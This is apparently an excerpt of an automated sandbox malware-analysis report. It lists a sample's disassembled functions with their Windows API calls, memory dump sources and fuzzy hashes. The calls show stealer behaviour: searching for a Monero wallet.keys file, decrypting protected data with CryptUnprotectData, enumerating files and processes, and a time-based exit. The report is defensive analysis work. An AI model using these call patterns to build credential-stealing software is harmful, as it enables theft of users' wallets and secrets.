                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: *le$:hOJ$B@H@$Jz_$qq9z$ 7$Eq\
                            • API String ID: 0-2278452203
                            • Opcode ID: 007ac023f1ed767047ef464d0679567a8daaaaba6762ea2719f205805f197edf
                            • Instruction ID: 480891c259de292d9d211d9105f49f1186369f5bc22bb0c63ada933252117170
                            • Opcode Fuzzy Hash: 007ac023f1ed767047ef464d0679567a8daaaaba6762ea2719f205805f197edf
                            • Instruction Fuzzy Hash: 75B2D4F3A082009FE704AE29EC8567ABBE5EF94320F16493DEAC4C7744E63598158797
                            Function 0067E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00690D73), ref: 0067E4A2
                            • StrCmpCA.SHLWAPI(?,006914F8), ref: 0067E4F2
                            • StrCmpCA.SHLWAPI(?,006914FC), ref: 0067E508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0067EBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: b4a7d722e07e2c27f8f88b7e379d88627a165aa0b4fc1488a30a30fdccee565d
                            • Instruction ID: a96320d9cdc8e2d805dbc1bb7e457ee58f3d7eeabcaa907b1b941c9f6c5a6889
                            • Opcode Fuzzy Hash: b4a7d722e07e2c27f8f88b7e379d88627a165aa0b4fc1488a30a30fdccee565d
                            • Instruction Fuzzy Hash: 321256719111149AEF58FBA0DC96DED733AAF54300F40439EB90A66091EF386F49CFA6
                            Function 00A366EA Relevance: 9.0, Strings: 6, Instructions: 1543COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ,Jm$:uf?$D=_$W/?$\|=i$,%{
                            • API String ID: 0-1816673933
                            • Opcode ID: b84f2e96f45d8fcf62cc6eb76490d7c4ad4d7ff2047c8c03e6a861979dc0a366
                            • Instruction ID: bbe3c8583aca9dc00c17442e28ef326d0b1e45b0be46b8cb76f682e5e1755b0b
                            • Opcode Fuzzy Hash: b84f2e96f45d8fcf62cc6eb76490d7c4ad4d7ff2047c8c03e6a861979dc0a366
                            • Instruction Fuzzy Hash: 45A2F3F3A0C2049FE314AE29EC8567AFBE9EF94320F16493DEAC4C3744E63558058697
                            Function 00679AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ng,00000000,00000000), ref: 00679AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00674EEE,00000000,?), ref: 00679B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ng,00000000,00000000), ref: 00679B2A
                            • LocalFree.KERNEL32(?,?,?,?,00674EEE,00000000,?), ref: 00679B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: Ng
                            • API String ID: 4291131564-1495073516
                            • Opcode ID: 41256c9d518fc115ebdfd936379710ba77d4b1b5e06a024b016b4850d7cda2c5
                            • Instruction ID: 3154d49ebbc7ae7ec139f4d557689ce246acec7e18d81f5dec07f29101af5bea
                            • Opcode Fuzzy Hash: 41256c9d518fc115ebdfd936379710ba77d4b1b5e06a024b016b4850d7cda2c5
                            • Instruction Fuzzy Hash: 1C11A4B4240308AFEB14CF64DC95FAA77B5FB89B00F208158F9199B390C775A901CB50
                            Function 00A34BF5 Relevance: 7.9, Strings: 5, Instructions: 1626COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: EO}+$Sdwv$cr^G$d3M$pkW=
                            • API String ID: 0-643821518
                            • Opcode ID: c7eb64b38e76a962f117e0b8adfcf33b61beab303710bfa00493664e313b187b
                            • Instruction ID: ea655a01477d527ff2c30bf4da6e0d00b9cf21c0cbb157ffd78852ad3504e261
                            • Opcode Fuzzy Hash: c7eb64b38e76a962f117e0b8adfcf33b61beab303710bfa00493664e313b187b
                            • Instruction Fuzzy Hash: F6B2D7F3608204AFE304AE2DEC8567ABBE5EFD4720F16893DE6C5C7744EA3558018697
                            Function 00A48B63 Relevance: 7.9, Strings: 5, Instructions: 1622COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: &;>$5GY$6j'Y$`(_|$~[<
                            • API String ID: 0-3502887050
                            • Opcode ID: d5a833f8cf379d1b36eccc4251990e3b95300e97517a72ffd17190cd32e4d59d
                            • Instruction ID: 29cf3b396059803df964db8f7dbbafdfc86cf25aa24da5bfbb041a9e28767ab7
                            • Opcode Fuzzy Hash: d5a833f8cf379d1b36eccc4251990e3b95300e97517a72ffd17190cd32e4d59d
                            • Instruction Fuzzy Hash: B0B227F360C2049FE304AE2DEC8567ABBE9EFD4720F1A893DE5C5C3744EA3558058696
                            Function 00A47001 Relevance: 7.8, Strings: 5, Instructions: 1576COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (8mt$:yL$RFUu$gQm$y _
                            • API String ID: 0-473400732
                            • Opcode ID: 5fa18fb3b68e7ae7598ee8119a946eadad509039242de1c18bb8d756ded0c628
                            • Instruction ID: 2ed82476f07d00d5259b844a0724873600d3ba7788d515631be3faf4e5e04d5a
                            • Opcode Fuzzy Hash: 5fa18fb3b68e7ae7598ee8119a946eadad509039242de1c18bb8d756ded0c628
                            • Instruction Fuzzy Hash: 9CB2F4F39083049FE3046E29EC8567ABBE9EF94720F1A493DEAC4C7740E67558058797
                            Function 0067C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0067C871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0067C87C
                            • lstrcat.KERNEL32(?,00690B46), ref: 0067C943
                            • lstrcat.KERNEL32(?,00690B47), ref: 0067C957
                            • lstrcat.KERNEL32(?,00690B4E), ref: 0067C978
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 3f9f0845b1e7797374568ddedf1165cbc470e0c952b406703a7f516bcc68d42b
                            • Instruction ID: 6ece2e81ce05e6ca1425599328fa24c0df0e19ced32f71f819004efeef6eda45
                            • Opcode Fuzzy Hash: 3f9f0845b1e7797374568ddedf1165cbc470e0c952b406703a7f516bcc68d42b
                            • Instruction Fuzzy Hash: 714180B5D0420AEFDB54DF90DD89BFEB7B9BB48304F1042A8E609A7280D7705A84CF91
                            Function 00686920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 0068696C
                            • sscanf.NTDLL ref: 00686999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006869B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006869C0
                            • ExitProcess.KERNEL32 ref: 006869DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: 415890d610d2e2337a9a515fe5a535db1d3236549c6bc4d050ee916453f8cec0
                            • Instruction ID: 299c8b91fd896bf89b241b7daa7f650555cff66a8c5fbc55e2baf1bb6fa89078
                            • Opcode Fuzzy Hash: 415890d610d2e2337a9a515fe5a535db1d3236549c6bc4d050ee916453f8cec0
                            • Instruction Fuzzy Hash: 1621CBB5D14209ABCF48EFE4D9459EEB7B6FF48300F04866EE406E3250EB345605CB69
                            Function 00677240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0067724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00677254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00677281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006772A4
                            • LocalFree.KERNEL32(?), ref: 006772AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 76d098f3c200b16b87b9d236cfc09bb2e0b827e5774a46be384682c0ea906f2d
                            • Instruction ID: 204b01f46e583daab563df35c862eed721fd0b5c8b97f9f1bd0c94defb54d8ed
                            • Opcode Fuzzy Hash: 76d098f3c200b16b87b9d236cfc09bb2e0b827e5774a46be384682c0ea906f2d
                            • Instruction Fuzzy Hash: 8F010075A40208BBEB14DFD4CD45F9E7779BB44701F108154FB19AA2C0D670AA018B65
                            Function 00689600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0068961E
                            • Process32First.KERNEL32(00690ACA,00000128), ref: 00689632
                            • Process32Next.KERNEL32(00690ACA,00000128), ref: 00689647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0068965C
                            • CloseHandle.KERNEL32(00690ACA), ref: 0068967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 3e4eacc186ebae7ee4121297dcc9550c381f9f1c209168b7adf801498ac086e1
                            • Instruction ID: 8f3726e0a0c4de28437b0f9f9d5eb2f72574c778031e13d1a3bcbab25c184042
                            • Opcode Fuzzy Hash: 3e4eacc186ebae7ee4121297dcc9550c381f9f1c209168b7adf801498ac086e1
                            • Instruction Fuzzy Hash: 56010C75A00208ABDB14DFA5DD58BEDB7F9FB48700F144398A905A6250EB349B80DF61
                            Function 00A3CE69 Relevance: 6.6, Strings: 4, Instructions: 1558COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
